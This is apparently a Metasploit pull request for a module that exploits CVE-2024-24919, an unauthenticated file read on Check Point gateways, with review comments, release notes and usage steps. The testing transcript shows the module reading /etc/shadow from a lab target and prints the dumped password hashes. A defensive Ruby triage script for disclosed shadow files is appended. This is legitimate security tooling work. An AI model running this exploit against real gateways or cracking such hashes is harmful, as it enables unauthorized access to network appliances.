Auxiliary module for CVE-2024-24919 - Check Point Security Gateway arbitrary file read #19221
Since Check Point has swapped out the download link on this page for a patched version, the link has been removed entirely.
Thanks for the great module @remmons-r7! Also for the steps to set up the test environment 👍 A couple of minor comments but other than those it looks good to go.
Testing
STORE_LOOT = true
msf6 > db_connect msf_user:notpassword@127.0.0.1:5432/msf_database
[*] Connected to Postgres data service: 127.0.0.1/msf_database
msf6 > use gather/checkpoint_gateway_fileread_cve_2024_24919
msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > set rhosts 172.16.199.52
rhosts => 172.16.199.52
msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > set ssl true
[!] Changing the SSL option's value may require changing RPORT!
ssl => true
msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > set STORE_LOOT true
STORE_LOOT => true
msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > run
[*] Running module against 172.16.199.52
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Arbitrary file read successful!
[+] Stored the file data to loot...
[*] Auxiliary module execution completed
msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > loot
Loot
====
host service type name content info path
---- ------- ---- ---- ------- ---- ----
172.16.199.52 shadow /etc/shadow text/plain File read from Check Point Security Gateway server /home/msfuser/.msf4/loot/20240612161112_default_172.16.199.52_shadow_636575.txt
msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > cat /home/msfuser/.msf4/loot/20240612161112_default_172.16.199.52_shadow_636575.txt
[*] exec: cat /home/msfuser/.msf4/loot/20240612161112_default_172.16.199.52_shadow_636575.txt
admin:$6$1HTJt2ZTyvTkurfN$Dp.MQ2UXWJXTRBQQdiq1fDY3df0QB2KMzqq5Xpx6NN.WtgnRSZiMtMKVFyhlr5RtGmmNX.E0HueE5xaD7vzzN/:14559:0:99999:8:::
monitor:*:19886:0:99999:8:::
root:*:19886:0:99999:7:::
cp_routeevt:*:19886:0:99999:7:::
nobody:*:19886:0:99999:7:::
postfix:*:19886:0:99999:7:::
rpm:!!:19886:0:99999:7:::
shutdown:*:19886:0:99999:7:::
pcap:!!:19886:0:99999:7:::
halt:*:19886:0:99999:7:::
cp_postgres:*:19886:0:99999:7:::
cp_extensions:*:19886:0:99999:7:::
cpep_user:*:19886:0:99999:7:::
vcsa:!!:19886:0:99999:7:::
_nonlocl:*:19886:0:99999:7:::
sshd:*:19886:0:99999:7:::
msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) >
STORE_LOOT = false
msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > set rhosts 172.16.199.52
rhosts => 172.16.199.52
msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > set ssl true
[!] Changing the SSL option's value may require changing RPORT!
ssl => true
msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > run
[*] Running module against 172.16.199.52
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Arbitrary file read successful!
[+] File read succeeded!
admin:$6$1HTJt2ZTyvTkurfN$Dp.MQ2UXWJXTRBQQdiq1fDY3df0QB2KMzqq5Xpx6NN.WtgnRSZiMtMKVFyhlr5RtGmmNX.E0HueE5xaD7vzzN/:14559:0:99999:8:::
monitor:*:19886:0:99999:8:::
root:*:19886:0:99999:7:::
cp_routeevt:*:19886:0:99999:7:::
nobody:*:19886:0:99999:7:::
postfix:*:19886:0:99999:7:::
rpm:!!:19886:0:99999:7:::
shutdown:*:19886:0:99999:7:::
pcap:!!:19886:0:99999:7:::
halt:*:19886:0:99999:7:::
cp_postgres:*:19886:0:99999:7:::
cp_extensions:*:19886:0:99999:7:::
cpep_user:*:19886:0:99999:7:::
vcsa:!!:19886:0:99999:7:::
_nonlocl:*:19886:0:99999:7:::
sshd:*:19886:0:99999:7:::
[*] Auxiliary module execution completed
modules/auxiliary/gather/checkpoint_gateway_fileread_cve_2024_24919.rb
documentation/modules/auxiliary/gather/checkpoint_gateway_fileread_cve_2024_24919.md
From peer review suggestion. Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
From peer review suggestion. Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
From peer review suggestion. Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
Secondary commit from peer review suggestion.
Release Notes
This module leverages an unauthenticated arbitrary root file read vulnerability for Check Point Security Gateway appliances. When the IPSec VPN or Mobile Access blades are enabled on affected devices, traversal payloads can be used to read any files on the local file system. This vulnerability is tracked as CVE-2024-24919.
This module leverages an unauthenticated arbitrary root file read vulnerability for Check Point Security Gateway appliances. When the IPSec VPN or Mobile Access blades are enabled on affected devices, traversal payloads can be used to read any files on the local file system. Password hashes read from disk may be cracked, potentially resulting in administrator-level access to the target device. This vulnerability is tracked as CVE-2024-24919.
Verification
use auxiliary/gather/checkpoint_gateway_fileread_cve_2024_24919
set RHOSTS <TARGET_IP_ADDRESS>
set RPORT <TARGET_PORT>
set TARGETFILE <TARGET_FILE_TO_READ>
set STORE_LOOT false if you want to display the file on the console instead of storing it as loot.
run
Example usage
I'll privately share a capture of the module running with a member of the Metasploit team. Thank you!
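Added example, not part of the pull request or the module: since the description notes that password hashes read from disk may be cracked, this Ruby sketch shows how a responder could triage a disclosed shadow(5) file to decide which accounts carry hash material and need credential rotation. The helper names (`classify`, `parse_shadow`, `needs_rotation`) are hypothetical, and the sample input is constructed with placeholder salts and hashes.

```ruby
require 'date'

# Constructed sample in shadow(5) format; salts and hashes are placeholders.
SAMPLE_SHADOW = <<~'SHADOW'
  admin:$6$EXAMPLESALT$EXAMPLEHASH:14559:0:99999:8:::
  monitor:*:19886:0:99999:8:::
  rpm:!!:19886:0:99999:7:::
  legacy:$1$EXAMPLESALT$EXAMPLEHASH:19000:0:99999:7:::
  parked:!$6$EXAMPLESALT$EXAMPLEHASH:19886:0:99999:7:::
  truncated:line
SHADOW

# crypt(3) scheme prefixes; anything else is reported as "unknown".
SCHEMES = { '1' => 'md5crypt', '2a' => 'bcrypt', '2b' => 'bcrypt', '2y' => 'bcrypt',
            '5' => 'sha256crypt', '6' => 'sha512crypt', 'y' => 'yescrypt' }.freeze

Entry = Struct.new(:user, :status, :scheme, :last_change)

# Classify one password field: does it carry hash material that was disclosed?
def classify(pw)
  return [:empty_password, nil] if pw.empty?
  locked = pw.start_with?('!')
  body = pw.sub(/\A!+/, '')
  if (m = body.match(/\A\$([0-9a-z]+)\$/))
    [locked ? :locked_hash_present : :hash_present, SCHEMES.fetch(m[1], 'unknown')]
  elsif body.match?(%r{\A[./0-9A-Za-z]{13}\z})
    [locked ? :locked_hash_present : :hash_present, 'descrypt']
  else
    [:no_hash, nil] # "*", "!", "!!" and similar markers hold no hash
  end
end

def parse_shadow(text)
  text.each_line.filter_map do |line|
    f = line.chomp.split(':', -1)
    next unless f.length == 9 # skip malformed or truncated lines
    status, scheme = classify(f[1])
    # Field 3 is the last password change, in days since 1970-01-01.
    changed = f[2].match?(/\A\d+\z/) ? Date.new(1970, 1, 1) + f[2].to_i : nil
    Entry.new(f[0], status, scheme, changed)
  end
end

# Accounts whose credentials must be treated as disclosed and rotated.
def needs_rotation(entries)
  entries.reject { |e| e.status == :no_hash }
end

if $PROGRAM_NAME == __FILE__
  needs_rotation(parse_shadow(SAMPLE_SHADOW)).each do |e|
    puts format('%-8s %-20s %-12s last changed %s', e.user, e.status, e.scheme, e.last_change)
  end
end
```

A locked account that still carries a hash (the `!` prefix) is reported separately, because unlocking it later would re-enable a password that has already been disclosed.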